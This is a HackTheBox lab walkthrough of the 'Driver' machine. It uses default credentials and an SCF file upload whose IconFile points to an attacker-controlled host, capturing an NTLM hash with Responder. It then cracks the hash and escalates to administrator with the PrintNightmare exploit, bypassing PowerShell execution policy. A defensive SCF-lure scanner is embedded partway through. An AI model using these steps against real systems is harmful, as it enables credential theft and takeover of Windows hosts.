DRIVER – HACKTHEBOX

This is a write-up/walkthrough of the Driver machine from HackTheBox.

nmap scan:

80/tcp  open  http         syn-ack Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open  msrpc        syn-ack Microsoft Windows RPC
445/tcp open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

Visiting port 80 prompted for a username and password; admin:admin worked. Behind it is a printer firmware update portal that lets us upload firmware files. While looking for a way to exploit this, I found an article about SCF file attacks.

Start Responder on the Linux attack box:

sudo responder -I tun0

Then modify the SCF payload taken from that article, pointing it at your own tunnel IP:

[Shell]
Command=2
IconFile=\\YOUR-TUNNEL-IP\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

Then upload the file as okay.scf through the portal, select any user and submit. Responder captured the NTLM hash of the user tony.
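As an added defensive check (not part of the original write-up), here is a small Python scanner that an upload handler or file-share monitor could run to flag SCF files whose IconFile points at a UNC path, which is what makes the lure above trigger an outbound SMB authentication. The sample content and the 192.0.2.10 host are constructed.

```python
import configparser
import re
from typing import Optional

# Constructed sample with the shape of the SCF lure described above;
# 192.0.2.10 (documentation range) stands in for the remote host.
SAMPLE_SCF = """[Shell]
Command=2
IconFile=\\\\192.0.2.10\\share\\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
"""

# Matches \\host\... and captures the host part of a UNC path.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def scf_unc_icon_host(content: str) -> Optional[str]:
    """Return the remote host an SCF file's IconFile points at, or None.

    Explorer resolves IconFile when it merely renders the folder listing,
    so a UNC path here causes an SMB connection (and NTLM authentication)
    without anyone opening the file. A benign SCF uses a local path.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(content)
    except configparser.Error:
        return None
    # INI section names are case-insensitive on Windows; keys are lowered
    # by configparser already.
    section = next((s for s in parser.sections() if s.lower() == "shell"), None)
    if section is None:
        return None
    icon = parser.get(section, "iconfile", fallback="").strip()
    match = UNC_RE.match(icon)
    return match.group(1) if match else None


def is_scf_lure(filename: str, content: str) -> bool:
    """True when an uploaded .scf file would reach out to a remote host."""
    return filename.lower().endswith(".scf") and scf_unc_icon_host(content) is not None
```

Blocking or alerting on such uploads (and disabling outbound SMB at the perimeter) removes the hash-capture path this write-up relies on.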

Crack the hash with john, then connect as tony with evil-winrm and grab the user flag.

Next, I found the PowerShell console history in tony's user directory. It contained a command that added a printer with a specific driver name; searching for that name turned up an exploit and a privilege escalation vector.

I tried it with Metasploit first, but it failed with "[-] Exploit aborted due to failure: bad-config: The payload should use the same architecture as the target driver". I tried both x64 and x86 payloads, so I think the error was on Metasploit's side. Since this machine is clearly set up for printer services, I checked the running processes and found spoolsv running. I already knew of an exploit that abuses the printer service and spoolsv, tried it, and it worked, giving me administrator.

Link to exploit: https://github.com/JohnHammond/CVE-2021-34527

Script loading is blocked by the execution policy, so bypass it for the current PowerShell process:

Get-ExecutionPolicy
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
# Load the script into the current session
. .\CVE-2021-34527.ps1

Then use the exploit to add a new user directly to the Administrators group:

Invoke-Nightmare -NewUser "procoder" -NewPassword "Procoder@123" -DriverName "PrintMe"

Finally, log in with evil-winrm as procoder, which is now in the Administrators group.

Let me know in the comment section if you run into any problems.
